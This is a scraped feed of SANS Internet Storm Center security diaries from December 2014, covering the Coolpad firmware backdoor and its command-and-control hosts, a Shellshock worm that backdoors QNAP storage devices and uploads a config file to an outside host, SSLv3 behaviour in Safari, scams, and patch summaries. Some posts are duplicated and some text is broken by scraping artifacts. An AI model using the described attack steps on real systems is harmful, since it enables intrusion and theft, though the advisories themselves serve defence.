Latest Alerts

Syndicate content SANS Internet Storm Center, InfoCON: green
Updated: 16 min 59 sec ago

Certified pre-pw0ned Android Smartphones: Coolpad Firmware Backdoor, (Wed, Dec 17th)

Wed, 12/17/2014 - 06:44

Researchers at Palo Alto found that many ROM images used for Android smart phones manufactured by Coolpad contain a backdoor, giving an attacker full control of the device. Palo Alto named the backdoor Coolreaper.

With Android, it is very common for manufacturers to install additional applications. But these applications are installed on top of the Android operating system. In this case, Coolpad integrated additional functionality into the firmware of the device. This backdoor was then used by Coolpad to push advertisements to its users and to install additional Android applications.But its functionality goes way beyond simple advertisements.

The backdoor provides full access to the device. It allows the installation of additional software, accessing any information about the device, and even notifying the user of fake over the air updates.

How important is this threat?

Coolpad devices are mostly used in China, with a market share of 11.5% according to the report. They are not found much outside of China. The phones are typically sold under brands like Coolpad, Dazen and Magview.

The following domains and IPs are used for the CC channel:

113.142.37.149, dmp.coolyn.com, dmp.51coolpad.com, icudata.coolyun.com, icudata.51coolpad.com, 113.142.37.246, icucfg.coolyun.com and others. Blocking and logging outbound traffic for these IPs will help you identify affected devices.

For details, see the Palo Alto Networks report athttps://www.paloaltonetworks.com/threat-research.html

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, December 17th 2014 http://isc.sans.edu/podcastdetail.html?id=4279, (Wed, Dec 17th)

Tue, 12/16/2014 - 19:29
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, December 17th 2014 http://isc.sans.edu/podcastdetail.html?id=4279, (Wed, Dec 17th)

Tue, 12/16/2014 - 19:29
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Some Memory Forensic with Forensic Suite (Volatility plugins), (Tue, Dec 16th)

Tue, 12/16/2014 - 10:17

In previous diaries we have talked about memory forensics and how important it is.

In this diary I will talk about a new volatility plugins called Forensic Suite written by Dave Lasalle.

The suite has 14 plugins and they cover different area of memory forensics

The Forensics Suite can be obtain from: http://downloads.volatilityfoundation.org/contest/2014/DaveLasalle_ForensicSuite.zip .

In this diary I will talk about some of the plugins

Firefox history:

To test this plugin first I browsed the internet using Firefox then I closed it to see how much data firefoxhistory plugin can obtain from the memory image that I acquired after closing firefox .

The firefoxhistory will parse the places.sqlite from the memory and show the output either on the screen or you can direct to csv file using output=csv option. If you use the output=csv option you will be able to play with your data using a spreadsheet software such as MS Excel">

vol.py --plugin=plugins/ --profile=Win7SP1x86 --output=csv -f sampleimage.raw firefoxhistory ">

vol.py --plugin=plugins/ --profile=Win7SP1x86 --output=csv -f sampleimage.raw firefoxcookies ">

vol.py --plugin=plugins/ --profile=Win7SP1x86 -f sampleimage.raw idxparser

">

Volatility Foundation Volatility Framework 2.4

Scanning for IDX files, this can take a while.............

--------------------------------------------------------------------------------

[*] Section 1 (Metadata) found:

Content length: 1624

Last modified date: Tue, 01 Feb 2005 18:28:24 GMT (epoch: 1107282504)

Section 2 length: 270

[*] Section 2 (Download History) found:

URL: http://java.com/jsp_utils/jreCheck.class

IP: 137.254.16.66

: HTTP/1.1 200 OK

content-length: 1624

last-modified: Tue, 01 Feb 2005 18:28:24 GMT

content-type: application/java-vm

date: Mon, 13 Feb 2012 04:21:28 GMT

server: Sun-Java-System-Web-Server/7.0

--------------------------------------------------------------------------------

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Tuesday, December 16th 2014 http://isc.sans.edu/podcastdetail.html?id=4277, (Tue, Dec 16th)

Mon, 12/15/2014 - 16:34
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Safari 8.0.2 Still Supporting SSLv3 with Block Ciphers, (Mon, Dec 15th)

Mon, 12/15/2014 - 14:30

In October, Apple released Security Update 2014-005, specifically with the intend to address the POODLE issue [1]. The description with the update stated:

There are known attacks on the confidentiality of SSL 3.0 when a cipher suite uses a block cipher in CBC mode. An attacker could force the use of SSL 3.0, even when the server would support a better TLS version, by blocking TLS 1.0 and higher connection attempts. This issue was addressed by disabling CBC cipher suites when TLS connection attempts fail.

However, even with the most recent version of Safari, I am still not able to prove this statement as true. Instead, I am able to connect to a test server that ONLY supports SSLv3 and block ciphers. [2] Multiple users of the site confirmed this observation, and the logs also confirm that current versions of Safari will happily ignore Apple"> SSL Record Layer: Handshake Protocol: Client Hello
Content Type: Handshake (22)
Version: TLS 1.0 (0x0301)
Length: 183
Handshake Protocol: Client Hello
Handshake Type: Client Hello (1)
Length: 179
Version: TLS 1.2 (0x0303)
"> Handshake Protocol: Server Hello
Handshake Type: Server Hello (2)
Length: 90
Version: SSL 3.0 (0x0300)
...
Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039)

The server offers AES, a block cipher (CBC) which is accepted by Safari.

Other issues we discovered with the poodletest.com website is the use of proxies. Some proxies still support SSLv3, and if they are configured as a trusted proxy terminating SSL connections, then they may downgrade a connection to SSLv3.

How serious is it? The POODLE attack is still a low probability attack. I am not aware of any active use of the attack. So no need to panic. But vendors like Apple arent helping with incomplete statements. It is possible that Safari is doing some form of downgrading protection. But this is not explained in the very brief advisory.

[1]https://support.apple.com/en-us/HT203107
[2]https://sslv3.dshield.org/vulnpoodle.png

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Customized Support Scam Supported by Typo Squatting, (Mon, Dec 15th)

Mon, 12/15/2014 - 13:11

This attack got it all, and shows how hard it can be for a non ISC reader to evade some of these tech support scams. The URL used, http://login.microsoftlonine.com is only one letter off from the legit Microsoft Office 365 login page (you noticed the extra letter?).

The content you will get back varies. But here is a screenshot submitted by our reader Daniel:

The user was redirected to warning.netsecurityalerts.com (the site appears down right now), and to bolster the sites credibility, it displays the users correct ISP (we all know this is an easy whois lookup, but a user confronted with this message is much more likely to fall for it then a recent message).

Calling the 800 number now will lead to a sales system trying to sell you a medial alert button if you are 50 years or older.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Customized Support Scam Supported by Typo Squatting, (Mon, Dec 15th)

Mon, 12/15/2014 - 13:11

This attack got it all, and shows how hard it can be for a non ISC reader to evade some of these tech support scams. The URL used, http://login.microsoftlonine.com is only one letter off from the legit Microsoft Office 365 login page (you noticed the extra letter?).

The content you will get back varies. But here is a screenshot submitted by our reader Daniel:

The user was redirected to warning.netsecurityalerts.com (the site appears down right now), and to bolster the sites credibility, it displays the users correct ISP (we all know this is an easy whois lookup, but a user confronted with this message is much more likely to fall for it then a recent message).

Calling the 800 number now will lead to a sales system trying to sell you a medial alert button if you are 50 years or older.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Monday, December 15th 2014 http://isc.sans.edu/podcastdetail.html?id=4275, (Mon, Dec 15th)

Sun, 12/14/2014 - 16:40
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Worm Backdoors and Secures QNAP Network Storage Devices, (Sun, Dec 14th)

Sun, 12/14/2014 - 10:21

Shellshock is far from over, with many devices still not patched andout there ready for exploitation. One set of thedevices receiving a lot of attention recently are QNAP disk storage systems. QNAP released a patch in early October, but applying the patch is not automatic and far from trivial for many users[1]. Our reader Erichsubmitted a link to an interesting Pastebin post with code commonly used in these scans [2]

The attack targets a QNAP CGI script, /cgi-bin/authLogin.cgi, a well known vector for Shellshock on QNAP devices [3]. This script is called during login, and reachable without authentication. The exploit is then used to launch a simple shell script that will download and execute a number of additional pieces of malware:

emme [sha1611bd8bea11d6edb68ed96583969f85469f87e0f]:

This appears to implement a click fraud script against advertisement network JuiceADV. The userid that is being used is4287 and as referrer,http://www.123linux.it is used. The user agent is altered based on a remote feed.

cl [sha1b61fa82063975ba0dcbbdae2d4d9e8d648ca1605]

A one liner shell script uploading part of /var/etc/CCcam.cfg to ppoolloo.altervista.com . My test QNAP system does not have this file, so I am not sure what they are after.

The script also created a hidden directory, /share/MD0_DATA/optware/.xpl, which is then used to stash some of the downloaded scripts and files.

Couple other changes made by the script:

  • Sets the DNS server to 8.8.8.8
  • creates an SSH server on port 26
  • adds an admin user called request
  • downloads and copies ascriptto cgi-bin: armgH.cgi and exo.cgi
  • modify autorun.sh to run the backdoors on reboot

Finally, the script will also download and install the Shellshock patch from QNAP and reboot the device.

Infected devices have been observed scanning for other vulnerable devices. I was not able to recover all of the scripts the code on pastebin downloads. The scanner may be contained in one of the additional scripts.

[1] http://www.qnap.com/i/en/news/con_show.php?op=showonecid=342
[2]http://pastebin.com/AQJgM5ij
[3] https://www.fireeye.com/blog/threat-research/2014/10/the-shellshock-aftershock-for-nas-administrators.html

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Worm Backdoors and Secures QNAP Network Storage Devices, (Sun, Dec 14th)

Sun, 12/14/2014 - 10:21

Shellshock is far from over, with many devices still not patched andout there ready for exploitation. One set of thedevices receiving a lot of attention recently are QNAP disk storage systems. QNAP released a patch in early October, but applying the patch is not automatic and far from trivial for many users[1]. Our reader Erichsubmitted a link to an interesting Pastebin post with code commonly used in these scans [2]

The attack targets a QNAP CGI script, /cgi-bin/authLogin.cgi, a well known vector for Shellshock on QNAP devices [3]. This script is called during login, and reachable without authentication. The exploit is then used to launch a simple shell script that will download and execute a number of additional pieces of malware:

emme [sha1611bd8bea11d6edb68ed96583969f85469f87e0f]:

This appears to implement a click fraud script against advertisement network JuiceADV. The userid that is being used is4287 and as referrer,http://www.123linux.it is used. The user agent is altered based on a remote feed.

cl [sha1b61fa82063975ba0dcbbdae2d4d9e8d648ca1605]

A one liner shell script uploading part of /var/etc/CCcam.cfg to ppoolloo.altervista.com . My test QNAP system does not have this file, so I am not sure what they are after.

The script also created a hidden directory, /share/MD0_DATA/optware/.xpl, which is then used to stash some of the downloaded scripts and files.

Couple other changes made by the script:

  • Sets the DNS server to 8.8.8.8
  • creates an SSH server on port 26
  • adds an admin user called request
  • downloads and copies ascriptto cgi-bin: armgH.cgi and exo.cgi
  • modify autorun.sh to run the backdoors on reboot

Finally, the script will also download and install the Shellshock patch from QNAP and reboot the device.

Infected devices have been observed scanning for other vulnerable devices. I was not able to recover all of the scripts the code on pastebin downloads. The scanner may be contained in one of the additional scripts.

[1] http://www.qnap.com/i/en/news/con_show.php?op=showonecid=342
[2]http://pastebin.com/AQJgM5ij
[3] https://www.fireeye.com/blog/threat-research/2014/10/the-shellshock-aftershock-for-nas-administrators.html

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Friday, December 12th 2014 http://isc.sans.edu/podcastdetail.html?id=4273, (Fri, Dec 12th)

Thu, 12/11/2014 - 19:09
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

GMail quirk used to subvert website spam tracking, (Wed, Dec 10th)

Thu, 12/11/2014 - 06:31

Yesterday while reviewing our logs here at the SANS Internet Storm Center I stumbled upon these:

login failed for s.ervic.d.157.6@gmail.com
login failed for se.rv.icd.15.76@gmail.com
login failed for r.a.mo.s.odalys.33.3@gmail.com
login failed for sho.ppin.g48service@gmail.com

The reason this caught my eye is because I recall reading that GMail ignores periods in email addresses. For example, if I register alexs12345@gmail.com but then begin sending email to a.l.e.x.s.1.2.3.4.5@gmail.com, it will arrive in my new inbox despite the additional periods.

Many blog and forum platforms have functionality for banning by email address. Spammers can use the periods in GMail addresses to subvert such banning controls by registering again without having to produce a truly new email address. Do your systems and/or websites allow for registering multiple accounts this way?

Where this becomes more interesting is that these logs indicate visitors that tried to log in using these email addresses without having even attempted to register them first. None of the above logs come from a single IP address, though the first two do come from a single IP range. Is this due to a poorly programmed bot, or is it indicative of something else?

Let us know what you think in the comments!

--
Alex Stanford - GIAC GWEB GSEC,
Research Operations Manager,
SANS Internet Storm Center
/in/alexstanford

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Thursday, December 11th 2014 http://isc.sans.edu/podcastdetail.html?id=4271, (Thu, Dec 11th)

Wed, 12/10/2014 - 17:59
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Odd new ssh scanning, possibly for D-Link devices, (Wed, Dec 10th)

Wed, 12/10/2014 - 11:49

I noticed it in my own logs overnight and also had a couple of readers (both named Peter) report some odd new ssh scanning overnight. The scanning involves many sites, likely a botnet, attempting to ssh in as 3 users, D-Link, admin, and ftpuser. Given the first of those usernames, I suspect that they are targetting improperly configured D-Link routers or other appliances that have some sort of default password. The system that I have at home was not running kippo, so I didnt get the passwords that they were guessing and was not able to see what they might do if they succeed in ssh-ing in. If anyone out there has any more info on what exactly they are targetting, please let us know by e-mail, via the contact page, or by commenting on this post. Ill try to reconfigure a couple of kippo honeypots to see if I can capture the bad guys there and may update this post later.

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Two VMWare Security Updates for vCloud Automation Center and Airwatch, (Wed, Dec 10th)

Wed, 12/10/2014 - 11:04

We got two security updates from VMWare this week:

VMWare ID CVE Product Details VMSA-2014-0013 CVE-2014-8373 VMware vCloud Automation Center Remote privilegeescalation vulnerability. Authenticated remote users may obtain administrative privileges. Mitigated by turning off Connect (by) Using VMRC VMSA-2014-0014 CVE-2014-8372 AirWatch A direct object reference vulnerability allows users to see each others information.

VMSA-2014-0013 (CVE:http://www.vmware.com/security/advisories/VMSA-2014-0013.html

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Malware Signed With Valid SONY Certificate (Update: This was a Joke!), (Wed, Dec 10th)

Wed, 12/10/2014 - 08:06

Update: Turns out that the malware sample that Kaspersky was reporting on was not actual malware from a real incident. But the story isnt quite harmless and the certificate should still be considered compromised. A researcherfound the certificate as part of the SONY data that was widely distributed by the attackers. The filename for the certificate was also the password for the private key. The researcher then created a signed copy of an existingmalware sample retrieved from Malwr, and uploaded it to Virustotal to alert security companies. Kaspersky analyzed the sample, and published the results, not realizing that this was not an in the wild sample. [1] The certificate has been added to respective CRLs.

--- original story ---

We havent really mentioned the ongoing SONY compromise here. In part, because there is very little solid information public (and we dont want to just speculate), and also, without a good idea about what happened, it is difficult to talk about lessons learned.

However, one facetof he attack may have wider implications. Securelist is reporting that they spotted malware that is signed with a valid SONY certificate. It is very likely that the secret key used to create the signature was part of the loot from the recent compromise. Having malware that is signed by a major corporation will make it much more likely for users to install the malware. It also emphasizes againthe depth at which SONY was (or is)compromised. [2]

An effort is underway to revoke the certificate. But certificate revocation lists are notoriously unreliable and slow to update so it may take a while for the revocation to propagate.

Stolen certificate serial number:01 e2 b4 f7 59 81 1c 64 37 9f ca 0b e7 6d 2d ce
Thumbprint:8d f4 6b 5f da c2 eb 3b 47 57 f9 98 66 c1 99 ff 2b 13 42 7a

[2]https://twitter.com/afreak/status/542539515500298240
[1]http://securelist.com/blog/security-policies/68073/destover-malware-now-digitally-signed-by-sony-certificates/

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, December 10th 2014 http://isc.sans.edu/podcastdetail.html?id=4269, (Wed, Dec 10th)

Tue, 12/09/2014 - 19:09
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Adobe December Patch Tuesday, (Wed, Dec 10th)

Tue, 12/09/2014 - 17:24

Adobe today released two new bulletins, and updaed the Reader/Acrobat bulletin that was published a week ago.

">This update fixes 6 vulnerabilities, some of which can lead to remote code execution. Adobe rates this patch with a priority of 1">This updates fixes 20 different vulnerabilities. The bulletin has a rating of 1.">This bulletin applies to ColdFusion 10 and 11 and fixes a denial of service vulnerability (CVE-2014-9166). The vulnerability has not been used in any exploits so far.

http://helpx.adobe.com/security.html

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Microsoft Patch Tuesday - December 2014, (Tue, Dec 9th)

Tue, 12/09/2014 - 11:25

Overview of the December 2014 Microsoft patches and their status.

# Affected Contra Indications - KB Known Exploits Microsoft rating(**) ISC rating(*) clients servers MS14-075 Vulnerabilities in Microsoft Exchange Server Could Allow Elevation of Privilege
(Replaces MS13-105) Microsoft Exchange

CVE-2014-6319
CVE-2014-6325
CVE-2014-6326
CVE-2014-6336 KB 3009712 . Severity:Important
Exploitability: N/A Important MS14-080 Cumulative Security Update for Internet Explorer
(Replaces MS14-065) Microsoft Windows, Internet Explorer
CVE-2014-6327, CVE-2014-6328, CVE-2014-6329, CVE-2014-6330, CVE-2014-6363, CVE-2014-6365, CVE-2014-6366, CVE-2014-6368, CVE-2014-6369, CVE-2014-6373, CVE-2014-6374, CVE-2014-6375, CVE-2014-6376, CVE-2014-8966 KB 3008923 . Severity:Critical
Exploitability: Critical Critical MS14-081 Vulnerabilities in Microsoft Word and Microsoft Office Web Apps Could Allow Remote Code Execution
(Replaces MS14-017 MS14-061 MS14-069) Microsoft Office

CVE-2014-6356
CVE-2014-6357 KB 3017301 . Severity:Critical
Exploitability: Critical Important MS14-082 Vulnerability in Microsoft Office Could Allow Remote Code Execution
(Replaces MS09-060) Microsoft Office

CVE-2014-6364 KB 3017349 . Severity:Important
Exploitability: Critical Important MS14-083 Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution
(Replaces MS13-085) Microsoft Office

CVE-2014-6360
CVE-2014-6361 KB 3017347 . Severity:Important
Exploitability: Critical Important MS14-084 Vulnerability in VBScript Scripting Engine Could Allow Remote Code Execution
(Replaces MS14-011) Microsoft Windows

CVE-2014-6363 KB 3016711 . Severity:Critical
Exploitability: Critical Critical MS14-085 Vulnerability in Microsoft Graphics Component Could Allow Information Disclosure Microsoft Windows

CVE-2014-6355 KB 3013126 vuln. public. Severity:Important
Exploitability: Important Important We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY (*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become interesting">Less Urt practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
    • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threatatches.

--
Alex Stanford - GIAC GWEB GSEC
Research Operations Manager,
SANS Internet Storm Center

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts